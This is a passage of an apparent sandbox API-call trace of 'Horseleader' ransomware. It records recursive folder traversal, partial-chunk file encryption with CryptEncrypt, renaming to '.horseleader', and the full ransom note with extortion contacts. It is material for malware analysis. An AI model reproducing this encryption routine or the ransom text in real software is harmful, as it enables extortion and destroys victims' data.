(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.291] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.292] CloseHandle (hObject=0x158) returned 1 [0248.292] GetProcessHeap () returned 0x780000 [0248.292] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.292] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WATERMAR", cAlternateFileName="")) returned 0 [0248.292] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0248.292] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\#Decrypt#.txt") returned 73 [0248.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0248.293] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.293] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0248.294] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.294] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0248.294] CloseHandle (hObject=0x21c) returned 1 [0248.294] GetProcessHeap () returned 0x780000 [0248.294] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0248.295] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="TRANSLAT", cAlternateFileName="")) returned 1 [0248.295] lstrcmpiW (lpString1="TRANSLAT", lpString2="Windows") returned -1 [0248.295] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT") returned 59 [0248.295] lstrcmpW (lpString1="TRANSLAT", lpString2=".") returned 1 [0248.295] lstrcmpW (lpString1="TRANSLAT", lpString2="..") returned 1 [0248.295] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.295] GetProcessHeap () returned 0x780000 [0248.295] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.295] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*") returned 61 [0248.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0248.297] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.297] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\.") returned 61 [0248.297] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.297] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0248.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.298] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\..") returned 62 [0248.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.298] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ARFR", cAlternateFileName="")) returned 1 [0248.298] lstrcmpiW (lpString1="ARFR", lpString2="Windows") returned -1 [0248.298] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR") returned 64 [0248.298] lstrcmpW (lpString1="ARFR", lpString2=".") returned 1 [0248.298] lstrcmpW (lpString1="ARFR", lpString2="..") returned 1 [0248.298] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.298] GetProcessHeap () returned 0x780000 [0248.298] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.298] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*") returned 66 [0248.298] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.299] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.299] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\.") returned 66 [0248.299] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.299] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.300] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\..") returned 67 [0248.300] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.300] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.300] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b324b00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b324b00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x195018, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ARFR.ITS", cAlternateFileName="")) returned 1 [0248.300] lstrcmpiW (lpString1="MSB1ARFR.ITS", lpString2="Windows") returned -1 [0248.300] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0248.300] StrStrIW (lpFirst="MSB1ARFR.ITS", lpSrch=".horseleader") returned 0x0 [0248.300] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.300] lstrcmpW (lpString1="MSB1ARFR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.300] lstrlenW (lpString=".testttjffg") returned 11 [0248.300] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.301] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.301] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.301] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned 77 [0248.302] StrStrW (lpFirst="MSB1ARFR.ITS", lpSrch=".txt") returned 0x0 [0248.302] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1658904) returned 1 [0248.302] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.302] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.304] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.304] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.306] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc800c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.306] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.309] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x190018, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.309] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.311] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.311] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.312] CloseHandle (hObject=0x1a4) returned 1 [0248.312] GetProcessHeap () returned 0x780000 [0248.312] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.312] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.horseleader") returned 89 [0248.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.horseleader")) returned 1 [0248.313] GetProcessHeap () returned 0x780000 [0248.314] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.314] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b324b00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b324b00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x195018, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ARFR.ITS", cAlternateFileName="")) returned 0 [0248.314] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.314] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\#Decrypt#.txt") returned 78 [0248.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.315] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.315] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.316] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpV